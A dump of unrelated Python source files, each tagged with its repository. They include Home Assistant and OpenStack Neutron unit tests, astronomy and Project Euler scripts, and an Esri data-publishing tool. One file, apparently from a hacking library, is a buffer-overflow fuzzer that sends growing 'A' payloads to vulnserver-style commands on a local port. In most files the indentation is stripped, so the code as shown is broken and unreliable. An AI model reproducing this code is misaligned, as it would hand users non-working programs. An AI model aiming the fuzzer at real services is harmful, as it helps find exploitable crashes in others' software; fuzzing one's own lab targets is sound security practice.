script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'delay': {'seconds': 5}},
{'event': event}]))
script_obj.run()
self.hass.block_till_done()
assert script_obj.is_running
assert len(events) == 0
script_obj.stop()
assert not script_obj.is_running
# Make sure the script is really stopped.
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(events) == 0
def test_passing_variables_to_script(self):
"""Test if we can pass variables to script."""
calls = []
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{
'service': 'test.script',
'data_template': {
'hello': '{{ greeting }}',
},
},
{'delay': '{{ delay_period }}'},
{
'service': 'test.script',
'data_template': {
'hello': '{{ greeting2 }}',
},
}]))
script_obj.run({
'greeting': 'world',
'greeting2': 'universe',
'delay_period': '00:00:05'
})
self.hass.block_till_done()
assert script_obj.is_running
assert len(calls) == 1
assert calls[-1].data['hello'] == 'world'
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(calls) == 2
assert calls[-1].data['hello'] == 'universe'
def test_condition(self):
"""Test if we can use conditions in a script."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
self.hass.states.set('test.entity', 'hello')
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state == "hello" }}',
},
{'event': event},
]))
script_obj.run()
self.hass.block_till_done()
assert len(events) == 2
self.hass.states.set('test.entity', 'goodbye')
script_obj.run()
self.hass.block_till_done()
assert len(events) == 3
@mock.patch('homeassistant.helpers.script.condition.async_from_config')
def test_condition_created_once(self, async_from_config):
"""Test that the conditions do not get created multiple times."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
self.hass.states.set('test.entity', 'hello')
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state == "hello" }}',
},
{'event': event},
]))
script_obj.run()
script_obj.run()
self.hass.block_till_done()
assert async_from_config.call_count == 1
assert len(script_obj._config_cache) == 1
def test_all_conditions_cached(self):
"""Test that multiple conditions get cached."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
self.hass.states.set('test.entity', 'hello')
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state == "hello" }}',
},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state != "hello" }}',
},
{'event': event},
]))
script_obj.run()
self.hass.block_till_done()
assert len(script_obj._config_cache) == 2
| srcLurker/home-assistant | tests/helpers/test_script.py | Python | mit | 9,951 |
#!/usr/bin/python
import socket
# Payloads of increasing length: "A", then 50, 100, ... up to 5000 "A"s.
buffer = ["A"]
counter = 50
while len(buffer) <= 100:
    buffer.append("A" * counter)
    counter = counter + 50
# Commands exposed by the target service; each is fuzzed with every payload.
commands = ["HELP", "STATS .", "RTIME .", "LTIME .", "SRUN .", "TRUN .", "GMON .", "GDOG .", "KSTET .", "GTER .", "HTER .", "LTER .", "KSTAN ."]
for command in commands:
for buffstring in buffer:
print "Fuzzing " +command +":"+str(len(buffstring))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 9999))
s.recv(50)
s.send(command + buffstring)
s.close()
| appseckev/python_hacking_library | simplefuzzer.py | Python | gpl-3.0 | 581 |
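For reference, a rough Python 3 port of the send loop — a sketch, not part of the original script; host, port, and banner size mirror the values above:

import socket

def fuzz(host, port, command, payload):
    # One connection per payload, as in the Python 2 loop above.
    with socket.create_connection((host, port)) as s:
        s.recv(50)  # consume the banner
        s.sendall((command + payload).encode("latin-1"))

for command in commands:
    for buffstring in buffer:
        print("Fuzzing %s:%d" % (command, len(buffstring)))
        fuzz("127.0.0.1", 9999, command, buffstring)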
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import itertools
import mock
import testtools
from webob import exc
from neutron import context
from neutron.db import models_v2
from neutron.extensions import external_net as external_net
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from neutron.tests.unit import test_api_v2
from neutron.tests.unit import test_db_plugin
LOG = logging.getLogger(__name__)
_uuid = uuidutils.generate_uuid
_get_path = test_api_v2._get_path
class ExtNetTestExtensionManager(object):
def get_resources(self):
return []
def get_actions(self):
return []
def get_request_extensions(self):
return []
class ExtNetDBTestCase(test_db_plugin.NeutronDbPluginV2TestCase):
def _create_network(self, fmt, name, admin_state_up, **kwargs):
"""Override the routine for allowing the router:external attribute."""
# attributes containing a colon should be passed with
# a double underscore
new_args = dict(itertools.izip(map(lambda x: x.replace('__', ':'),
kwargs),
kwargs.values()))
arg_list = new_args.pop('arg_list', ()) + (external_net.EXTERNAL,)
return super(ExtNetDBTestCase, self)._create_network(
fmt, name, admin_state_up, arg_list=arg_list, **new_args)
def setUp(self):
plugin = 'neutron.tests.unit.test_l3_plugin.TestNoL3NatPlugin'
ext_mgr = ExtNetTestExtensionManager()
super(ExtNetDBTestCase, self).setUp(plugin=plugin, ext_mgr=ext_mgr)
def _set_net_external(self, net_id):
self._update('networks', net_id,
{'network': {external_net.EXTERNAL: True}})
def test_list_nets_external(self):
with self.network() as n1:
self._set_net_external(n1['network']['id'])
with self.network():
body = self._list('networks')
self.assertEqual(len(body['networks']), 2)
body = self._list('networks',
query_params="%s=True" %
external_net.EXTERNAL)
self.assertEqual(len(body['networks']), 1)
body = self._list('networks',
query_params="%s=False" %
external_net.EXTERNAL)
self.assertEqual(len(body['networks']), 1)
def test_list_nets_external_pagination(self):
if self._skip_native_pagination:
self.skipTest("Skip test for not implemented pagination feature")
with contextlib.nested(self.network(name='net1'),
self.network(name='net3')) as (n1, n3):
self._set_net_external(n1['network']['id'])
self._set_net_external(n3['network']['id'])
with self.network(name='net2') as n2:
self._test_list_with_pagination(
'network', (n1, n3), ('name', 'asc'), 1, 3,
query_params='router:external=True')
self._test_list_with_pagination(
'network', (n2, ), ('name', 'asc'), 1, 2,
query_params='router:external=False')
def test_get_network_succeeds_without_filter(self):
plugin = manager.NeutronManager.get_plugin()
ctx = context.Context(None, None, is_admin=True)
result = plugin.get_networks(ctx, filters=None)
self.assertEqual(result, [])
def test_update_network_set_external_non_admin_fails(self):
# Assert that a non-admin user cannot update the
# router:external attribute
with self.network(tenant_id='noadmin') as network:
data = {'network': {'router:external': True}}
req = self.new_update_request('networks',
data,
network['network']['id'])
req.environ['neutron.context'] = context.Context('', 'noadmin')
res = req.get_response(self.api)
self.assertEqual(exc.HTTPForbidden.code, res.status_int)
def test_network_filter_hook_admin_context(self):
plugin = manager.NeutronManager.get_plugin()
ctx = context.Context(None, None, is_admin=True)
model = models_v2.Network
conditions = plugin._network_filter_hook(ctx, model, [])
self.assertEqual(conditions, [])
def test_network_filter_hook_nonadmin_context(self):
plugin = manager.NeutronManager.get_plugin()
ctx = context.Context('edinson', 'cavani')
model = models_v2.Network
txt = "externalnetworks.network_id IS NOT NULL"
conditions = plugin._network_filter_hook(ctx, model, [])
self.assertEqual(conditions.__str__(), txt)
# Try to concatenate conditions
conditions = plugin._network_filter_hook(ctx, model, conditions)
self.assertEqual(conditions.__str__(), "%s OR %s" % (txt, txt))
def test_create_port_external_network_non_admin_fails(self):
with self.network(router__external=True) as ext_net:
with self.subnet(network=ext_net) as ext_subnet:
with testtools.ExpectedException(
exc.HTTPClientError) as ctx_manager:
with self.port(subnet=ext_subnet,
set_context='True',
tenant_id='noadmin'):
pass
self.assertEqual(ctx_manager.exception.code, 403)
def test_create_port_external_network_admin_succeeds(self):
with self.network(router__external=True) as ext_net:
with self.subnet(network=ext_net) as ext_subnet:
with self.port(subnet=ext_subnet) as port:
self.assertEqual(port['port']['network_id'],
ext_net['network']['id'])
def test_create_external_network_non_admin_fails(self):
with testtools.ExpectedException(exc.HTTPClientError) as ctx_manager:
with self.network(router__external=True,
set_context='True',
tenant_id='noadmin'):
pass
self.assertEqual(ctx_manager.exception.code, 403)
def test_create_external_network_admin_succeeds(self):
with self.network(router__external=True) as ext_net:
self.assertEqual(ext_net['network'][external_net.EXTERNAL],
True)
def test_delete_network_check_disassociated_floatingips(self):
with mock.patch.object(manager.NeutronManager,
'get_service_plugins') as srv_plugins:
l3_mock = mock.Mock()
srv_plugins.return_value = {'L3_ROUTER_NAT': l3_mock}
with self.network() as net:
req = self.new_delete_request('networks', net['network']['id'])
res = req.get_response(self.api)
self.assertEqual(res.status_int, exc.HTTPNoContent.code)
(l3_mock.delete_disassociated_floatingips
.assert_called_once_with(mock.ANY, net['network']['id']))
| rdo-management/neutron | neutron/tests/unit/test_extension_ext_net.py | Python | apache-2.0 | 7,932 |
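In isolation, the double-underscore mapping performed by _create_network above looks like this (illustration only):

import itertools

kwargs = {'router__external': True, 'name': 'n1'}
new_args = dict(itertools.izip(
    (k.replace('__', ':') for k in kwargs), kwargs.values()))
# new_args == {'router:external': True, 'name': 'n1'}   (use zip() on Python 3)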
import math
def is_pentagonal(n):
    """Return True if n is a pentagonal number P_k = k*(3*k - 1)/2."""
    # n is pentagonal iff (1 + sqrt(24*n + 1)) / 6 is a positive integer.
    root = math.sqrt(24 * n + 1)
    return root == int(root) and (1 + int(root)) % 6 == 0
| Daphron/project-euler | p44.py | Python | gpl-3.0 | 84 |
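The file stops before the actual search; a sketch of how is_pentagonal could be used to answer Problem 44 (the search strategy is an assumption, not recovered from the original):

def find_min_pentagonal_difference():
    k = 2
    while True:
        pk = k * (3 * k - 1) // 2
        for j in range(k - 1, 0, -1):
            pj = j * (3 * j - 1) // 2
            if is_pentagonal(pk - pj) and is_pentagonal(pk + pj):
                return pk - pj
        k += 1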
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function
import os
import glob
import h5py
import fitsio
import numpy as np
fns = glob.glob("data/k2/*.fits.gz")
base_fns = [os.path.split(fn)[1] for fn in fns]
n = len(fns)
meta = np.empty(n, dtype=[
("fn", np.str_, max(map(len, base_fns))), ("ra", float), ("dec", float),
("xmin", int), ("xmax", int), ("ymin", int), ("ymax", int)
])
print("First pass...")
for i, fn in enumerate(fns):
meta["fn"][i] = base_fns[i]
hdr = fitsio.read_header(fn, 2)
meta["ra"][i] = hdr["RA_OBJ"]
meta["dec"][i] = hdr["DEC_OBJ"]
meta["xmin"][i] = hdr["CRVAL1P"]
meta["xmax"][i] = hdr["CRVAL1P"] + hdr["NAXIS1"]
meta["ymin"][i] = hdr["CRVAL2P"]
meta["ymax"][i] = hdr["CRVAL2P"] + hdr["NAXIS2"]
# Normalize the axes.
meta["xmax"] -= meta["xmin"].min()
meta["xmin"] -= meta["xmin"].min()
meta["ymax"] -= meta["ymin"].min()
meta["ymin"] -= meta["ymin"].min()
print("Second pass...")
img, mask = None, None
quality = None
for i, fn in enumerate(fns):
tbl = fitsio.read(fn)
xi, yi = np.meshgrid(range(meta["xmin"][i], meta["xmax"][i]),
range(meta["ymin"][i], meta["ymax"][i]))
flux = tbl["FLUX"]
if img is None:
img = np.empty((len(flux), meta["xmax"].max(),
meta["ymax"].max()), dtype=float)
mask = np.zeros(img.shape[1:], dtype=bool)
img[:, xi, yi] = flux
mask[xi, yi] = True
time = tbl["TIME"]
# Save a FITS image for WCS calibration using astrometry.net
fitsio.write("data/k2.fits", img[-1], clobber=True)
# Save the block of frames as a huge HDF5 file.
print("Saving...")
with h5py.File("data/k2.h5", "w") as f:
f.create_dataset("frames", data=img)
f.create_dataset("mask", data=mask)
f.create_dataset("time", data=time)
| dfm/photoica | stitch.py | Python | mit | 1,839 |
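Reading the stitched cube back is symmetric; a minimal sketch using the dataset names written above:

import h5py

with h5py.File("data/k2.h5", "r") as f:
    frames = f["frames"][:]  # (n_frames, nx, ny) image stack
    mask = f["mask"][:]      # True where any postage stamp covered the pixel
    time = f["time"][:]
print(frames.shape, mask.sum(), time[0])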
# -*- coding: utf-8 -*-
# Part of hexy. See LICENSE file for full copyright and licensing details.
import os
import sys
import arrow
from .util.bubble import Bubble
from .util.deb import deb,debset
from .grid import (grid_make,
grid_reset,
grid_show,
grid_set_point,
grid_add_line,
grid_add_circle)
from .draw import grid_draw
from .read import grid_read
from .cslice import grid_cslice
from .cursor import grid_cursor
HEXY_START_ARROW=arrow.now()
from . import metadata
"""hexy, hexagonal ascii drawing toolkit"""
HEXY_SIMPLE_LOGO = """
#: _ _ _ _
#: / _ _ _ \
#: / / _ _ \ \
#: / / / _ \ \ \
#: \ \ \_ _/ / /
#: \ \_ _ _/ /
#: \_ _ _ _/
#:
"""
__version__ = metadata.version
__author__ = metadata.authors[0]
__license__ = metadata.license
__copyright__ = metadata.copyright
class Hexy(object):
""" basic Hexagonal grid manager """
def __init__(self,x=1,y=1):
self.X=x
self.Y=y
#cursor
self.cx=None
self.cy=None
self.cformat=None
self.grid=grid_make(x,y)
        self.dumb = False  # does not remember state between consecutive method calls
def show(self):
return grid_show(self.grid)
def draw(self,xpos,ypos,size):
grid_draw(self.grid,xpos,ypos,size,self.X,self.Y)
def reset(self):
self.grid=grid_reset(self.grid,self.X,self.Y)
def cursor(self,xpos,ypos,cformat):
self.cx=xpos
self.cy=ypos
self.cformat=cformat
self.grid=grid_cursor(self.grid,xpos,ypos,cformat,self.X,self.Y)
def point(self,xpos,ypos,char):
self.grid=grid_set_point(self.grid,xpos,ypos,char,self.X,self.Y)
def circle(self,xpos,ypos,rmin,rmax,char):
self.grid=grid_add_circle(self.grid,xpos,ypos,rmin,rmax,char,self.X,self.Y)
def line(self,xpos,ypos,chars,size,direction):
if self.dumb:
self.grid=grid_make(self.X,self.Y)
grid,X,Y=grid_add_line(self.grid,xpos,ypos,size,direction,chars,self.X,self.Y)
self.grid=grid
def read(self,fc=[]):
g,x,y=grid_read(fc)
self.X=x
self.Y=y
self.grid=g
deb('read:',g,x,y)
def cslice(self,f,t,d):
self.grid=grid_cslice(self.grid,f,t,d)
deb('slice:',self)
def hexy():
return Hexy()
| e7dal/hexy | hexy/__init__.py | Python | gpl-3.0 | 2,172 |
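A short usage sketch of the Hexy wrapper; the exact rendering depends on the grid helpers, so output is not shown:

h = Hexy(x=9, y=9)
h.point(4, 4, '*')                        # mark a single cell
h.circle(4, 4, rmin=2, rmax=3, char='o')  # ring around it
print(h.show())
h.reset()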
"""Utilities available to workbench applications."""
def make_safe_for_html(html):
"""Turn the text `html` into a real HTML string."""
html = html.replace("&", "&")
html = html.replace(" ", " ")
html = html.replace("<", "<")
html = html.replace("\n", "<br>")
return html
| jamiefolsom/xblock-sdk | workbench/util.py | Python | agpl-3.0 | 309 |
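A doctest-style example; note that the escaping order matters — "&" is replaced first, so the ampersands inside the inserted entities are not double-escaped:

>>> make_safe_for_html("x < y & z\ndone")
'x&nbsp;&lt;&nbsp;y&nbsp;&amp;&nbsp;z<br>done'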
"""
-------------------------------------------------------------------------------
| Copyright 2016 Esri
|
| Licensed under the Apache License, Version 2.0 (the "License");
| you may not use this file except in compliance with the License.
| You may obtain a copy of the License at
|
| http://www.apache.org/licenses/LICENSE-2.0
|
| Unless required by applicable law or agreed to in writing, software
| distributed under the License is distributed on an "AS IS" BASIS,
| WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
| See the License for the specific language governing permissions and
| limitations under the License.
------------------------------------------------------------------------------
"""
# dlaPublish.py - Publish one source to a target
# ----------------------------------------------------------------------------------------------------------------------
'''
This script is called by both the Append Data and Replace Data tools. It can be run
as a Geoprocessing script directly or by calling dlaPublish.publish from another script.
Note that in the GP script approach a source and target dataset can be provided as parameters to override the settings
in the Xml Config file. In this case just a single xml file should be passed with the datasets as the 2nd and 3rd
parameters. By default this will use the Append approach; to replace data instead, set the
_useReplaceSettings variable before calling publish (see the example following this script).
'''
import arcpy,dlaExtractLayerToGDB,dlaFieldCalculator,dlaService,dla,dlaService,xml.dom.minidom,os
arcpy.AddMessage("Data Assistant")
xmlFileNames = arcpy.GetParameterAsText(0) # xml file name as a parameter, multiple values separated by ;
continue_on_error = arcpy.GetParameterAsText(2) # boolean check to see if xml should continue or not on error
_outParam = 1
_useReplaceSettings = False # change this from a calling script to make this script replace data.
_chunkSize = 100
def main(argv = None):
# this approach makes it easier to call publish from other python scripts with using GP tool method
publish(xmlFileNames, continue_on_error)
def publish(xmlFileNames, continue_on_error):
# function called from main or from another script, performs the data update processing
global _useReplaceSettings
dla._errCount = 0
dla.addMessage("CONTINUE ON ERROR SET TO: "+ str(continue_on_error))
arcpy.SetProgressor("default","Data Assistant")
arcpy.SetProgressorLabel("Data Assistant")
xmlFiles = xmlFileNames.split(";")
layers = []
for xmlFile in xmlFiles: # multi value parameter, loop for each file
xmlFile = dla.getXmlDocName(xmlFile)
dla.addMessage("Configuration file: " + xmlFile)
xmlDoc = dla.getXmlDoc(xmlFile) # parse the xml document
if xmlDoc == None:
dla.addError("No XML document could be parsed. Please ensure the path to the xml document is correct")
if continue_on_error:
continue
else:
return
prj = dla.setProject(xmlFile,dla.getNodeValue(xmlDoc,"Project"))
if prj == None:
dla.addError("Unable to open your project, please ensure it is in the same folder as your current project or your Config file")
if continue_on_error:
continue
else:
return False
source = dla.getDatasetPath(xmlDoc,"Source")
target = dla.getDatasetPath(xmlDoc,"Target")
targetName = dla.getDatasetName(target)
dla.addMessage(source)
dla.addMessage(target)
if dlaService.checkLayerIsService(source) or dlaService.checkLayerIsService(target):
token = dlaService.getSigninToken() # when signed in get the token and use this. Will be requested many times during the publish
# exit here before doing other things if not signed in
if token == None:
dla.addError("User must be signed in for this tool to work with services")
if continue_on_error:
continue
else:
return False
expr = getWhereClause(xmlDoc)
if _useReplaceSettings == True and (expr == '' or expr == None):
dla.addError("There must be an expression for replacing by field value, current value = " + str(expr))
if continue_on_error:
continue
else:
return False
errs = False
if dlaService.validateSourceUrl(source) == False:
dla.addError("Source path does not appear to be a valid feature layer")
errs = True
if _useReplaceSettings == True:
if dlaService.validateTargetReplace(target) == False:
dla.addError("Target path does not have correct privileges")
errs = True
elif _useReplaceSettings == False:
if dlaService.validateTargetAppend(target) == False:
dla.addError("Target path does not have correct privileges")
errs = True
if errs:
if continue_on_error:
continue
else:
return False
dla.setWorkspace()
if dla.isTable(source) or dla.isTable(target):
datasetType = 'Table'
else:
datasetType = 'FeatureClass'
if not dla.isStaged(xmlDoc):
res = dlaExtractLayerToGDB.extract(xmlFile,None,dla.workspace,source,target,datasetType)
if res != True:
table = dla.getTempTable(targetName)
msg = "Unable to export data, there is a lock on existing datasets or another unknown error"
if arcpy.TestSchemaLock(table) != True and arcpy.Exists(table) == True:
msg = "Unable to export data, there is a lock on the intermediate feature class: " + table
dla.addError(msg)
print(msg)
if continue_on_error:
continue
else:
return
else:
res = dlaFieldCalculator.calculate(xmlFile,dla.workspace,targetName,False, continue_on_error)
if res == True:
dlaTable = dla.getTempTable(targetName)
res = doPublish(xmlDoc,dlaTable,target,_useReplaceSettings)
else:
dla.addMessage('Data previously staged, will proceed using intermediate dataset')
dlaTable = dla.workspace + os.sep + dla.getStagingName(source,target)
res = doPublish(xmlDoc,dlaTable,target,_useReplaceSettings)
if res == True:
dla.removeStagingElement(xmlDoc)
xmlDoc.writexml(open(xmlFile, 'wt', encoding='utf-8'))
dla.addMessage('Staging element removed from config file')
arcpy.ResetProgressor()
if res == False:
err = "Data Assistant Update Failed, see messages for details"
dla.addError(err)
print(err)
else:
layers.append(target)
arcpy.SetParameter(_outParam,';'.join(layers))
def doPublish(xmlDoc,dlaTable,target,useReplaceSettings):
# either truncate and replace or replace by field value
# run locally or update agol
success = False
expr = ''
dlaTable = handleGeometryChanges(dlaTable,target)
if useReplaceSettings == True:
expr = getWhereClause(xmlDoc)
if useReplaceSettings == True and (expr == '' or expr == None):
dla.addError("There must be an expression for replacing by field value, current value = '" + str(expr) + "'")
return False
currGlobalIDs = arcpy.env.preserveGlobalIds
if dla.processGlobalIds(xmlDoc) and currGlobalIDs == False: # both datasets have globalids in the correct workspace types
arcpy.env.preserveGlobalIds = True
target = dla.getNodeValue(xmlDoc,"Target")
if target.startswith("http") == True:
success = dlaService.doPublishHttp(dlaTable,target,expr,useReplaceSettings)
else:
# logic change - if not replace field settings then only append
if expr != '' and useReplaceSettings == True:
if dla.deleteRows(target,expr) == True:
success = dla.appendRows(dlaTable,target,expr,continue_on_error)
else:
success = False
else:
success = dla.appendRows(dlaTable,target,'',continue_on_error)
if currGlobalIDs != arcpy.env.preserveGlobalIds:
arcpy.env.preserveGlobalIds = currGlobalIDs
return success
def getWhereClause(xmlDoc):
# get the where clause using the xml document or return ''
repl = xmlDoc.getElementsByTagName("ReplaceBy")[0]
fieldName = dla.getNodeValue(repl,"FieldName")
operator = dla.getNodeValue(repl,"Operator")
value = dla.getNodeValue(repl,"Value")
expr = ''
type = getTargetType(xmlDoc,fieldName)
if fieldName != '' and fieldName != '(None)' and operator != "Where":
if type == 'String':
value = "'" + value + "'"
expr = fieldName + " " + operator + " " + value
elif operator == 'Where':
expr = value
else:
expr = '' # empty string by default
return expr
def getTargetType(xmlDoc,fname):
# get the target field type
for tfield in xmlDoc.getElementsByTagName('TargetField'):
nm = tfield.getAttribute("Name")
if nm == fname:
return tfield.getAttribute("Type")
def handleGeometryChanges(sourceDataset,target):
# simplfiy polygons
if dla.isTable(sourceDataset):
return sourceDataset
desc = arcpy.Describe(sourceDataset) # assuming local file gdb
dataset = sourceDataset
if desc.ShapeType == "Polygon" and (target.lower().startswith("http://") == True or target.lower().startswith("https://") == True):
dataset = simplifyPolygons(sourceDataset)
else:
dataset = sourceDataset
return dataset
def simplifyPolygons(sourceDataset):
# simplify polygons using approach developed by Chris Bus.
dla.addMessage("Simplifying (densifying) Geometry")
arcpy.Densify_edit(sourceDataset)
simplify = sourceDataset + '_simplified'
if arcpy.Exists(simplify):
arcpy.Delete_management(simplify)
if arcpy.Exists(simplify + '_Pnt'):
arcpy.Delete_management(simplify + '_Pnt')
arcpy.SimplifyPolygon_cartography(sourceDataset, simplify, "POINT_REMOVE", "1 Meters")
return simplify
if __name__ == "__main__":
main()
| JRosenfeldIntern/data-assistant | Shared/GPTools/arcpy/dlaPublish.py | Python | apache-2.0 | 10,633 |
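The module docstring above points to an example of the replace behavior; a minimal calling sketch, with the xml file name as a placeholder:

import dlaPublish

dlaPublish._useReplaceSettings = True  # switch from Append to Replace behavior
dlaPublish.publish("MySourceToTarget.xml", continue_on_error=False)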
import os
import unittest
from manolo_scraper.spiders.minsa import MinsaSpider
from utils import fake_response_from_file
class TestMinsaSpider(unittest.TestCase):
def setUp(self):
self.spider = MinsaSpider()
def test_parse_item(self):
filename = os.path.join('data/minsa', '18-08-2015.html')
items = self.spider.parse(fake_response_from_file(filename, meta={'date': u'18/08/2015'}))
item = next(items)
self.assertEqual(item.get('full_name'), u'MELENDEZ ARISTA GREIDY')
self.assertEqual(item.get('time_start'), u'18:45:09')
self.assertEqual(item.get('institution'), u'minsa')
self.assertEqual(item.get('id_document'), u'DNI')
self.assertEqual(item.get('id_number'), u'41339966')
self.assertEqual(item.get('entity'), u'DIRESA AMAZONAS')
self.assertEqual(item.get('reason'), u'TRAMITE')
self.assertEqual(item.get('host_name'), u'VELASQUEZ VALDIVIA ANIBAL')
self.assertEqual(item.get('title'), u'MINISTRO DE SALUD')
self.assertEqual(item.get('office'), u'DESPACHO MINISTERIAL')
self.assertEqual(item.get('time_end'), None)
self.assertEqual(item.get('date'), u'2015-08-18')
number_of_items = 1 + sum(1 for x in items)
self.assertEqual(number_of_items, 20)
| aniversarioperu/django-manolo | scrapers/tests/test_minsa_spider.py | Python | bsd-3-clause | 1,311 |
# Mercurial extension to provide 'hg relink' command
#
# Copyright (C) 2007 Brendan Cully <brendan@kublai.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""recreates hardlinks between repository clones"""
from mercurial import cmdutil, hg, util, error
from mercurial.i18n import _
import os, stat
cmdtable = {}
command = cmdutil.command(cmdtable)
# Note for extension authors: ONLY specify testedwith = 'internal' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = 'internal'
@command('relink', [], _('[ORIGIN]'))
def relink(ui, repo, origin=None, **opts):
"""recreate hardlinks between two repositories
When repositories are cloned locally, their data files will be
hardlinked so that they only use the space of a single repository.
Unfortunately, subsequent pulls into either repository will break
hardlinks for any files touched by the new changesets, even if
both repositories end up pulling the same changes.
Similarly, passing --rev to "hg clone" will fail to use any
hardlinks, falling back to a complete copy of the source
repository.
This command lets you recreate those hardlinks and reclaim that
wasted space.
This repository will be relinked to share space with ORIGIN, which
must be on the same local disk. If ORIGIN is omitted, looks for
"default-relink", then "default", in [paths].
Do not attempt any read operations on this repository while the
command is running. (Both repositories will be locked against
writes.)
"""
if (not util.safehasattr(util, 'samefile') or
not util.safehasattr(util, 'samedevice')):
raise error.Abort(_('hardlinks are not supported on this system'))
src = hg.repository(repo.baseui, ui.expandpath(origin or 'default-relink',
origin or 'default'))
ui.status(_('relinking %s to %s\n') % (src.store.path, repo.store.path))
if repo.root == src.root:
ui.status(_('there is nothing to relink\n'))
return
if not util.samedevice(src.store.path, repo.store.path):
# No point in continuing
raise error.Abort(_('source and destination are on different devices'))
locallock = repo.lock()
try:
remotelock = src.lock()
try:
candidates = sorted(collect(src, ui))
targets = prune(candidates, src.store.path, repo.store.path, ui)
do_relink(src.store.path, repo.store.path, targets, ui)
finally:
remotelock.release()
finally:
locallock.release()
def collect(src, ui):
seplen = len(os.path.sep)
candidates = []
live = len(src['tip'].manifest())
# Your average repository has some files which were deleted before
# the tip revision. We account for that by assuming that there are
# 3 tracked files for every 2 live files as of the tip version of
# the repository.
#
# mozilla-central as of 2010-06-10 had a ratio of just over 7:5.
total = live * 3 // 2
src = src.store.path
pos = 0
ui.status(_("tip has %d files, estimated total number of files: %d\n")
% (live, total))
for dirpath, dirnames, filenames in os.walk(src):
dirnames.sort()
relpath = dirpath[len(src) + seplen:]
for filename in sorted(filenames):
if filename[-2:] not in ('.d', '.i'):
continue
st = os.stat(os.path.join(dirpath, filename))
if not stat.S_ISREG(st.st_mode):
continue
pos += 1
candidates.append((os.path.join(relpath, filename), st))
ui.progress(_('collecting'), pos, filename, _('files'), total)
ui.progress(_('collecting'), None)
ui.status(_('collected %d candidate storage files\n') % len(candidates))
return candidates
def prune(candidates, src, dst, ui):
def linkfilter(src, dst, st):
try:
ts = os.stat(dst)
except OSError:
# Destination doesn't have this file?
return False
if util.samefile(src, dst):
return False
if not util.samedevice(src, dst):
# No point in continuing
raise error.Abort(
_('source and destination are on different devices'))
if st.st_size != ts.st_size:
return False
return st
targets = []
total = len(candidates)
pos = 0
for fn, st in candidates:
pos += 1
srcpath = os.path.join(src, fn)
tgt = os.path.join(dst, fn)
ts = linkfilter(srcpath, tgt, st)
if not ts:
ui.debug('not linkable: %s\n' % fn)
continue
targets.append((fn, ts.st_size))
ui.progress(_('pruning'), pos, fn, _('files'), total)
ui.progress(_('pruning'), None)
ui.status(_('pruned down to %d probably relinkable files\n') % len(targets))
return targets
def do_relink(src, dst, files, ui):
def relinkfile(src, dst):
bak = dst + '.bak'
os.rename(dst, bak)
try:
util.oslink(src, dst)
except OSError:
os.rename(bak, dst)
raise
os.remove(bak)
CHUNKLEN = 65536
relinked = 0
savedbytes = 0
pos = 0
total = len(files)
for f, sz in files:
pos += 1
source = os.path.join(src, f)
tgt = os.path.join(dst, f)
# Binary mode, so that read() works correctly, especially on Windows
sfp = file(source, 'rb')
dfp = file(tgt, 'rb')
sin = sfp.read(CHUNKLEN)
while sin:
din = dfp.read(CHUNKLEN)
if sin != din:
break
sin = sfp.read(CHUNKLEN)
sfp.close()
dfp.close()
if sin:
ui.debug('not linkable: %s\n' % f)
continue
try:
relinkfile(source, tgt)
ui.progress(_('relinking'), pos, f, _('files'), total)
relinked += 1
savedbytes += sz
except OSError as inst:
ui.warn('%s: %s\n' % (tgt, str(inst)))
ui.progress(_('relinking'), None)
ui.status(_('relinked %d files (%s reclaimed)\n') %
(relinked, util.bytecount(savedbytes)))
| seewindcn/tortoisehg | src/hgext/relink.py | Python | gpl-2.0 | 6,459 |
# Parallelized gridsearch using a package that integrates Spark with scikit-learn.
# I couldn't run this in AWS EC2 because I couldn't manage to download
# the right versions of Spark, PySpark, Python, Pip, and the dependencies all together.
# It's definitely possible, just beyond my current linux abilities.
from sklearn import grid_search
from sklearn.ensemble import RandomForestClassifier
from spark_sklearn import GridSearchCV
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
##################### Data Wrangling #######################################
data_path = "./x_data_3.csv"
df = pd.read_csv(data_path, header=0)
x_data = df.drop('category', 1)
y = df.category.as_matrix()
x_complete = x_data.fillna(x_data.mean())
X_raw = x_complete.as_matrix()
X = MinMaxScaler().fit_transform(X_raw)
np.random.seed(0)
shuffle = np.random.permutation(np.arange(X.shape[0]))
X, y = X[shuffle], y[shuffle]
